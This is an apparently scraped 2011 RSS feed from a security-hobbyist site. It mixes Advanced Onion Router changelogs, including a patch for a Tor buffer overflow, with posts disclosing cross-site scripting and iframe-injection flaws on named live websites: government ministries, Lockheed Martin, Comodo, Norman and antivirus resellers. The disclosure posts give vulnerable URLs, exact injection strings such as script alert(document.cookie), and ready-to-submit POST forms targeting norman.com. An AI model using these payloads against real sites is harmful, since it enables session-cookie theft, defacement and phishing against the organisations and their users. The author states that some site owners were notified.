nemesis.te-home.net http://nemesis.te-home.net <![CDATA[Advanced Onion Router 0.3.0.2b]]> http://nemesis.te-home.net/
Changes:
  • corrected: when entering hibernation, directory connections were not closed
  • only routers that are not considered bad exits are added to the system tray menus unless they are added to favorites
  • routers that are marked as invalid/not running/fake will have their bandwidth rate prefixed by a question mark in the exit selection dialog


Download:

]]>
http://nemesis.te-home.net/ Sat, 26 Nov 2011 10:31:56 GMT 315059841
<![CDATA[The Ministry of Communication and Information Technologies of the Republic of Azerbaijan - XSS & Iframe Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ The Ministry of Communication and Information Technologies of the Republic of Azerbaijan

Search strings:

Code:
"><h1>XSS_by_Team_Elite</h1>


and

Code:
"><iframe src=main.html></iframe>


PoC:

XSS -

http://img338.imageshack.us/img338/3637/xsss.png

Iframe Injection -

http://img406.imageshack.us/img406/2923/iframe.png

The administration has been notified about the flaw.
']['€AM€LiT€]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sat, 26 Nov 2011 12:24:27 GMT 1012942524
<![CDATA[Federal Ministry Of Information And Communications Of Nigeria - XSS & Iframe Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Federal Ministry Of Information And Communications Of Nigeria

Vulnerable page: http://www.fmic.gov.ng/search.asp

Search strings:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


PoC:

XSS -

http://img829.imageshack.us/img829/577/xssnigeria.png

Iframe Injection -

http://img405.imageshack.us/img405/1199/iframenigeria.png

The administration has been notified about the flaw.
']['€AM€LiT€]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 27 Nov 2011 13:22:08 GMT 1623254818
<![CDATA[Ministry of Information and Communications of Nepal - XSS & Iframe Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Ministry of Information and Communications Of Nepal

Vulnerable page: http://www.moic.gov.np/contacts.php

I filled in all the forms with the following strings:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


PoC:

XSS -

http://img16.imageshack.us/img16/633/xssnepal.png

Iframe Injection -

http://img707.imageshack.us/img707/7807/iframenepal.png

The administration has been notified about the problem.
']['€AM€LiT€]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 27 Nov 2011 13:29:02 GMT 3410425453
<![CDATA[ArcaBit - XSS & Iframe Injection]]> http://nemesis.te-home.net/ I found an XSS and Iframe on ArcaBit's website 2 years ago. Since then, their website has changed a lot, but some old mistakes remained. It seems some people don't learn from their mistakes.

Vulnerable page: https://www.arcabit.pl/sklep?app=shop_checkout

In order to reproduce the bug, you need to fill in all the required fields with something valid, and those which are not required with something like:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


PoC:

XSS -

http://img337.imageshack.us/img337/3382/xssf.png

Iframe Injection -

http://img10.imageshack.us/img10/4466/iframev.png

NOTE: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Sun, 27 Nov 2011 14:24:30 GMT 1677123987
<![CDATA[Advanced Onion Router 0.3.0.3a]]> http://nemesis.te-home.net/
Changes:
  • corrected: hidden services are no longer added twice for versions 0 and 2 (support for version 0 was removed from tor-0.2.2.34); HiddenServiceVersion was removed
  • new options on the "Connections" page: "Bandwidth rate per connection" (PerConnBWRate) and "Bandwidth burst per connection" (PerConnBWBurst)
  • new options on the "Circuit build" page: "Learn circuit build timeout" (LearnCircuitBuildTimeout), "Stream timeout until trying a new circuit (seconds)" (CircuitStreamTimeout) and "Cell scale factor" (CircuitPriorityHalflife)
  • new option on the "Become a server" page: "Refuse exit streams from unknown relays" (RefuseUnknownExits)
  • new option on the "Private identity" page: "Reinitialize the global SSL context" (IdentityFlags&IDENTITY_FLAG_REINIT_KEYS, default value: IDENTITY_FLAG_REINIT_KEYS)
  • the options AllowDotExit, HTTPFlags&HTTP_SETTING_REJECT_EXITNAME and HTTPFlags&HTTP_SETTING_REJECT_ONION were merged as AllowTorHosts (default value: ALLOW_DOT_ONION)
  • the options "Reject requests for *.exitname.exit URL's" and "Reject requests for *.onion URL's" were moved from the "HTTP headers" page to the "Banned addresses" page
  • updated language strings: 3020, 3181, 3182, 3183, 3184, 3185, 3186, 3187, 3188, 3189
  • corrected: when the options to reject hosts ending with ".exitname.exit" or ".onion" were enabled, the suffix was searched from a wrong position


Download:

]]>
http://nemesis.te-home.net/ Sat, 3 Dec 2011 17:15:08 GMT 190926123
<![CDATA[Advanced Onion Router 0.3.0.4]]> http://nemesis.te-home.net/
Changes:
  • the option "Allow invalid certification authorities from certificates for bridges.torproject.org" was removed; on error, a message box will ask if the download should be retried ignoring unrecognized CAs
  • the options TunnelDirConns (BOOL) and PreferTunneledDirConns (BOOL) were merged as TunnelDirConns (UINT)
  • all procedures that handle proxy requests for OR and directory connections were moved to connection_proxy.c
  • the options HttpsProxy, HttpsProxyAuthenticator, Socks4Proxy, Socks5Proxy, Socks5ProxyUsername and Socks5ProxyPassword were merged as ORProxy, ORProxyAuthenticator and ORProxyProtocol (supported protocols: HTTPS, Socks4 and Socks5)
  • added support for HTTPS, Socks4 and Socks5 proxies for HTTP directory connections
  • the options HttpProxy and HttpProxyAuthenticator were replaced with DirProxy, DirProxyAuthenticator and DirProxyProtocol (supported protocols: HTTP, HTTPS, Socks4 and Socks5)
  • updated language strings: 656, 2540, 2541, 2542, 2875, 2991, 2992, 2993, 2994, 2995, 2996, 2998, 3031, 3190
  • the instructions for making a "Tor browser" with Firefox and the AdvOR.ini sample for Firefox were updated to work with the latest "Tor Browser" package from torproject.org (tor-browser-2.2.34-3_en-US.exe)
  • geoip_c.h was updated with GeoIPCountryWhois.csv released on December 7th


Download:

]]>
http://nemesis.te-home.net/ Sat, 10 Dec 2011 22:03:51 GMT 725840853
<![CDATA[Advanced Onion Router 0.3.0.4b]]> http://nemesis.te-home.net/
Changes:
  • corrected: buffer overflow when repacking the first chunk of a buf_t buffer (bugfix for AdvOR and Tor, all versions)


Download:

]]>
http://nemesis.te-home.net/ Tue, 13 Dec 2011 18:04:34 GMT 2254062534
<![CDATA[Advanced Onion Router 0.3.0.5]]> http://nemesis.te-home.net/
Changes:
  • corrected: when the option to reject .exitname.exit hostnames was enabled, addresses that were mapped to exit nodes were also rejected (thanks to DavidWakelin for reporting this problem)
  • when the circuit path length is set to 1, the option "Do not use the public key step for the entry node" will be disabled
  • new configuration options: CorporateProxy, CorporateProxyDomain, CorporateProxyAuthenticator and CorporateProxyProtocol (supported protocols: NTLM)
  • added support for NTLM proxies (libntlm 1.3)
  • new options on the "Bypass ISP filtering" page: "Always use this NTLM proxy" (CorporateProxy, CorporateProxyProtocol), "workstation@domain" (CorporateProxyDomain), "Account (username:password)" (CorporateProxyAuthenticator)
  • the NTLM proxy can be chained with ORProxy and/or DirProxy if needed; when enabled, the NTLM proxy is always the first proxy of a proxy chain
  • updated language strings: 3191, 3192, 3193, 3194, 3195, 3196, 3197, 3198, 3199, 3200


Download:


Note: A buffer overflow error was corrected in version 0.3.0.4b of AdvOR. This error is present in all versions of AdvOR lower than 0.3.0.4b and in all versions of Tor. Remote exploitation is possible, so everyone is advised to update.

On December 13th I notified the torproject.org team about this error and I told them that in buffers.c they should replace this:
Code:
                /* We don't need to grow the first chunk, but we might need to repack it.*/
                if(CHUNK_REMAINING_CAPACITY(buf->head) < capacity-buf->datalen)
                        chunk_repack(buf->head);
                tor_assert(CHUNK_REMAINING_CAPACITY(buf->head) >= capacity-buf->datalen);
with this:
Code:
                /* We don't need to grow the first chunk, but we might need to repack it.*/
                if(CHUNK_REMAINING_CAPACITY(buf->head) < capacity-buf->head->datalen)
                        chunk_repack(buf->head);
                tor_assert(CHUNK_REMAINING_CAPACITY(buf->head) >= capacity-buf->head->datalen);


So far, this error is corrected only in AdvOR 0.3.0.4b and 0.3.0.5.

Tor users will have to wait for a bug fix from torproject.org.

]]>
http://nemesis.te-home.net/ Thu, 15 Dec 2011 18:41:32 GMT 2111114123
<![CDATA[Lockheed Martin - XSS & Iframe Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ http://www.lockheedmartin.com/contact_us/ContactUs.html

In order to reproduce the bug, you need to fill in all contact fields with something like:

Code:
"><h1>XSS found by Team Elite</h1>


or

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


PoC:

XSS -

http://img714.imageshack.us/img714/4988/xssrs.png

Iframe Injection -

http://img836.imageshack.us/img836/2923/iframe.png

NOTE: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Fri, 16 Dec 2011 15:46:02 GMT 2408095577
<![CDATA[Advanced Onion Router 0.3.0.6]]> http://nemesis.te-home.net/
Changes:
  • [tor-0.2.2.35] (this change was not applied because AdvOR already had a better fix since 0.3.0.4b) Fix a heap overflow bug that could occur when trying to pull data into the first chunk of a buffer, when that chunk had already had some data drained from it. Fixes CVE-2011-2778; bugfix on 0.2.0.16-alpha. Reported by "Vektor".
  • [tor-0.2.2.35] Initialize Libevent with the EVENT_BASE_FLAG_NOLOCK flag enabled, so that it doesn't attempt to allocate a socketpair. This could cause some problems on Windows systems with overzealous firewalls. Fix for bug 4457; workaround for Libevent versions 2.0.1-alpha through 2.0.15-stable.
  • [tor-0.2.2.35] If we mark an OR connection for close based on a cell we process, don't process any further cells on it. We already avoid further reads on marked-for-close connections, but now we also discard the cells we'd already read. Fixes bug 4299; bugfix on 0.2.0.10-alpha, which was the first version where we might mark a connection for close based on processing a cell on it.
  • [tor-0.2.2.35] Correctly sanity-check that we don't underflow on a memory allocation (and then assert) for hidden service introduction point decryption. Bug discovered by Dan Rosenberg. Fixes bug 4410; bugfix on 0.2.1.5-alpha.
  • [tor-0.2.2.35] Fix a memory leak when we check whether a hidden service descriptor has any usable introduction points left. Fixes bug 4424. Bugfix on 0.2.2.25-alpha.
  • [tor-0.2.2.35] Detect failure to initialize Libevent. This fix provides better detection for future instances of bug 4457.
  • [tor-0.2.2.35] Avoid frequent calls to the fairly expensive cull_wedged_cpuworkers function. This was eating up hideously large amounts of time on some busy servers. Fixes bug 4518; bugfix on 0.0.9.8.
  • [tor-0.2.2.35] Resolve an integer overflow bug in smartlist_ensure_capacity(). Fixes bug 4230; bugfix on Tor 0.1.0.1-rc. Based on a patch by Mansour Moufid.
  • [tor-0.2.2.35] When configuring, starting, or stopping an NT service, stop immediately after the service configuration attempt has succeeded or failed. Fixes bug 3963; bugfix on 0.2.0.7-alpha.
  • [tor-0.2.2.35] When sending a NETINFO cell, include the original address received for the other side, not its canonical address. Found by "troll_un"; fixes bug 4349; bugfix on 0.2.0.10-alpha.
  • [tor-0.2.2.35] Fix a memory leak in launch_direct_bridge_descriptor_fetch() that occurred when a client tried to fetch a descriptor for a bridge in ExcludeNodes. Fixes bug 4383; bugfix on 0.2.2.25-alpha.
  • [tor-0.2.2.35] If we had ever tried to call tor_addr_to_str on an address of unknown type, we would have done a strdup on an uninitialized buffer. Now we won't. Fixes bug 4529; bugfix on 0.2.1.3-alpha. Reported by "troll_un".
  • [tor-0.2.2.35] Correctly detect and handle transient lookup failures from tor_addr_lookup. Fixes bug 4530; bugfix on 0.2.1.5-alpha. Reported by "troll_un".
  • [tor-0.2.2.35] Fix null-pointer access that could occur if TLS allocation failed. Fixes bug 4531; bugfix on 0.2.0.20-rc. Found by "troll_un".
  • [tor-0.2.2.35] Use tor_socket_t type for listener argument to accept(). Fixes bug 4535; bugfix on 0.2.2.28-beta. Found by "troll_un".
  • [tor-0.2.2.35] Add two new config options for directory authorities: AuthDirFastGuarantee sets a bandwidth threshold for guaranteeing the Fast flag, and AuthDirGuardBWGuarantee sets a bandwidth threshold that is always sufficient to satisfy the bandwidth requirement for the Guard flag. Now it will be easier for researchers to simulate Tor networks with different values. Resolves ticket 4484.
  • corrected: the OR port was set while initializing keys (thanks to DavidWakelin for reporting this error)
  • updated language strings: 3201, 3202


Download:

]]>
http://nemesis.te-home.net/ Fri, 16 Dec 2011 23:37:22 GMT 142261638
<![CDATA[Norman.com XSS Vulnerability]]> http://nemesis.te-home.net/index.html http://www.norman.com/

PoC:

Code:
@ onekey
"><img src=http://nemesis.te-home.net/img/logo.jpg />
"><script>alert(document.cookie)</script>


To reproduce the bug you need an HTML form that uses the POST method and onekey as the XSS code input field. Click on the example button:



http://img62.imageshack.us/img62/9605/norm1.png
http://img208.imageshack.us/img208/7928/norm2.png

Related stuff: Another Kaspersky.com XSS Vulnerability

Note: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Sat, 17 Dec 2011 02:32:17 GMT 3140786916
<![CDATA[Comodo.com XSS Vulnerability]]> http://nemesis.te-home.net/index.html
https://accounts.comodo.com/

PoC:

Code:
https://accounts.comodo.com/account/forget_password?user[login]="><img src=http://nemesis.te-home.net/img/logo.jpg />

https://accounts.comodo.com/account/forget_password?user[login]="><script>alert(document.cookie)</script>

You can either include any HTML code from the login input box, or request any HTML code directly using the GET method and the user[login] parameter. In either case, don't forget to close the login box input tag.

http://img84.imageshack.us/img84/6797/como1.png

http://img807.imageshack.us/img807/1682/como2.png

Related stuff: Norman.com XSS Vulnerability

Note: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Sat, 17 Dec 2011 15:39:48 GMT 1883784531
<![CDATA[Avast (Polish website) - XSS & Iframe Injection]]> http://nemesis.te-home.net/index.html http://www.lers.pl/koszyk/krok2

In order to reproduce the bug, you need to include any HTML code in all required fields. The code I used:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><img src=http://nemesis.te-home.net/img/logo.jpg />


Screenshots:

XSS -

http://img31.imageshack.us/img31/9846/avastxss.png

Iframe Injection -

http://img9.imageshack.us/img9/2183/iframeavast.png

Note: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Sun, 18 Dec 2011 09:59:39 GMT 3694744508
<![CDATA[Kaspersky (Polish website) - XSS & Iframe Injection]]> http://nemesis.te-home.net/index.html https://www.softbuy.pl/kaspersky/store

In order to reproduce the bug, you need to include any HTML code in all required fields. The code I used:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


Screenshots:

XSS -

http://img535.imageshack.us/img535/5586/xsskaspersky.png

Iframe Injection -

http://img191.imageshack.us/img191/2293/kasperskyiframe.png

Note: This is a proof of concept and it doesn't reflect the views or interests of the above website.
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Sun, 18 Dec 2011 10:11:50 GMT 3642461272
<![CDATA[Another Norman.com XSS Vulnerability]]> http://nemesis.te-home.net/index.html http://www.norman.com/support/

PoC:

Code:
<form method="post" action="http://www.norman.com/support/lost_authentication_key">
<input type="hidden" name="lime_uniqueIdentifier" value="1" />
<input type="hidden" name="email" value=""><img src=http://nemesis.te-home.net/img/logo.jpg />" />
<input type="submit" value="XSS" />
</form>

<form method="post" action="http://www.norman.com/support/lost_authentication_key">
<input type="hidden" name="lime_uniqueIdentifier" value="1" />
<input type="hidden" name="email" value=""><script>alert(document.cookie)</script>" />
<input type="submit" value="XSS" />
</form>

To reproduce the bug you need an HTML form that uses the POST method, set the lime_uniqueIdentifier input tag value to 1 and use email as the XSS code input field. Click on the example button:


http://img834.imageshack.us/img834/9605/norm1.png

http://img703.imageshack.us/img703/7928/norm2.png

Related stuff: Norman.com XSS Vulnerability

Notes:

This is a proof of concept and it doesn't reflect the views or interests of the above website.
The owner of the above website has been notified.
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Mon, 19 Dec 2011 21:26:12 GMT 3946418905
<![CDATA[Avira.com - XSS]]> http://nemesis.te-home.net/ http://www.avira.com/en/support-phonesupport-for-business

In order to reproduce the bug, you need to include any HTML code in all required fields. The code I've used:

Code:
"><h1>XSS by TE</h1>


Screenshot:

http://img18.imageshack.us/img18/6125/beztytuuxjj.png

Note: This is a proof of concept and it doesn't reflect the views or interests of the above website. The administration of the above website has been informed about the flaw.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Tue, 20 Dec 2011 11:22:04 GMT 3049184645
<![CDATA[Advanced Onion Router 0.3.0.7]]> http://nemesis.te-home.net/
Changes:
  • corrected a change from version 0.3.0.6 in tor_addr_port_parse() that caused it to return errors when parsing proxy IP addresses (thanks to anonymous11 for reporting this error)
  • improved the search algorithm for addresses that are added to the context menus related to strings selected in the "Debug" window
  • all router selection dialogs will show bandwidth capacities instead of bandwidth rates for routers that are not banned
  • the lists with favorite routers and with banned routers are no longer limited to 65536 characters
  • added instructions for using TorChat with AdvOR and configuration samples to AdvOR\Help\TorChat (readme.txt, AdvOR.ini and torrc.txt)


Download:

]]>
http://nemesis.te-home.net/ Tue, 20 Dec 2011 19:53:13 GMT 1475416847
<![CDATA[testing]]> http://hexhub.feardc.net/news.html
']['€AM€LiT€]]>
http://hexhub.feardc.net/news.html Thu, 22 Dec 2011 15:55:24 GMT 3509515375
<![CDATA[Merry Christmas!]]> http://nemesis.te-home.net/
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Sat, 24 Dec 2011 19:10:31 GMT 2494675271